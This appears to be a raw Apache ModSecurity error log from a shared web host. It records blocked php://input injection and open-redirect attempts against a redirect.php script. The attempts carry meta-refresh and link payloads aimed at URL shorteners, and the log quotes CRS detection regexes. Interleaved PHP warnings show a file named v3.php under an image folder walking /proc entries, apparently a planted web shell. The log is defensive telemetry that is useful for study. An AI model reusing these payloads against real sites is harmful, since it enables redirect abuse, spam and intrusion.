[Tue May 12 05:32:52.484306 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://input found within ARGS:url: php://input\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxwAAAFU"]
[Tue May 12 05:32:52.484802 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 13)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxwAAAFU"]
[Tue May 12 05:32:52.485072 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxwAAAFU"]
PHP Warning:  filesize(): stat failed for /proc/950/task/950/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/950/task/950/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/950/task/950/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/950/task/950/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/950/task/950/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/950/task/950/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:33:44.607326 2026] [security2:error] [pid 1825179:tid 1825210] [client 194.233.64.127:54209] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://maps.google.at/url?q=https://goto.now/48wb7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://maps.google.at/url?q=https://goto.now/48wb7 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmNr1yOh9Tvizezig6gAAAEw"]
[Tue May 12 05:33:44.607722 2026] [security2:error] [pid 1825179:tid 1825210] [client 194.233.64.127:54209] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmNr1yOh9Tvizezig6gAAAEw"]
[Tue May 12 05:33:44.607868 2026] [security2:error] [pid 1825179:tid 1825210] [client 194.233.64.127:54209] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmNr1yOh9Tvizezig6gAAAEw"]
[Tue May 12 05:33:44.607969 2026] [security2:error] [pid 1825179:tid 1825210] [client 194.233.64.127:54209] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmNr1yOh9Tvizezig6gAAAEw"]
[Tue May 12 05:33:44.608164 2026] [security2:error] [pid 1825179:tid 1825210] [client 194.233.64.127:54209] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-24 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmNr1yOh9Tvizezig6gAAAEw"]
[Tue May 12 05:33:44.608568 2026] [security2:error] [pid 1825179:tid 1825210] [client 194.233.64.127:54209] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmNr1yOh9Tvizezig6gAAAEw"]
[Tue May 12 05:33:44.608805 2026] [security2:error] [pid 1825179:tid 1825210] [client 194.233.64.127:54209] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmNr1yOh9Tvizezig6gAAAEw"]
[Tue May 12 05:33:45.248007 2026] [security2:error] [pid 1842385:tid 1842411] [client 194.233.64.127:54224] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://maps.google.at/url?q=https://goto.now/48wb7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://maps.google.at/url?q=https://goto.now/48wb7 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmRs7kySIUZ3ORnImmwAAARQ"]
[Tue May 12 05:33:45.248403 2026] [security2:error] [pid 1842385:tid 1842411] [client 194.233.64.127:54224] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmRs7kySIUZ3ORnImmwAAARQ"]
[Tue May 12 05:33:45.248566 2026] [security2:error] [pid 1842385:tid 1842411] [client 194.233.64.127:54224] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmRs7kySIUZ3ORnImmwAAARQ"]
[Tue May 12 05:33:45.248657 2026] [security2:error] [pid 1842385:tid 1842411] [client 194.233.64.127:54224] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmRs7kySIUZ3ORnImmwAAARQ"]
[Tue May 12 05:33:45.248835 2026] [security2:error] [pid 1842385:tid 1842411] [client 194.233.64.127:54224] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Maps.google.at/url?q=https://goto.now/48WB7>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Maps.google.at/url?q=https://goto.now/48WB7 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-24 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmRs7kySIUZ3ORnImmwAAARQ"]
[Tue May 12 05:33:45.249263 2026] [security2:error] [pid 1842385:tid 1842411] [client 194.233.64.127:54224] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmRs7kySIUZ3ORnImmwAAARQ"]
[Tue May 12 05:33:45.249517 2026] [security2:error] [pid 1842385:tid 1842411] [client 194.233.64.127:54224] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfmRs7kySIUZ3ORnImmwAAARQ"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174174/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174174/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174174/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174174/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174174/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174174/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/224/task/224/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/224/task/224/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/224/task/224/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/224/task/224/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/224/task/224/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/224/task/224/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:35:57.310107 2026] [security2:error] [pid 1844863:tid 1844890] [client 43.135.183.82:42590] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/"] [unique_id "agKgHfaAnTZtx1_H_wy4bgAAAVU"]
[Tue May 12 05:36:00.959223 2026] [security2:error] [pid 1842385:tid 1842411] [client 43.135.183.82:47468] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/"] [unique_id "agKgIBs7kySIUZ3ORnIngAAAARQ"], referer: http://homin.fr
[Tue May 12 05:36:22.864967 2026] [security2:error] [pid 1820198:tid 1820223] [client 194.233.64.127:59464] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fyvi>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fyvi />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgNs1tk6y7yBJLpJo7YwAAAJc"]
[Tue May 12 05:36:22.865591 2026] [security2:error] [pid 1820198:tid 1820223] [client 194.233.64.127:59464] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgNs1tk6y7yBJLpJo7YwAAAJc"]
[Tue May 12 05:36:22.865934 2026] [security2:error] [pid 1820198:tid 1820223] [client 194.233.64.127:59464] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgNs1tk6y7yBJLpJo7YwAAAJc"]
[Tue May 12 05:36:22.866284 2026] [security2:error] [pid 1820198:tid 1820223] [client 194.233.64.127:59464] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSens [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgNs1tk6y7yBJLpJo7YwAAAJc"]
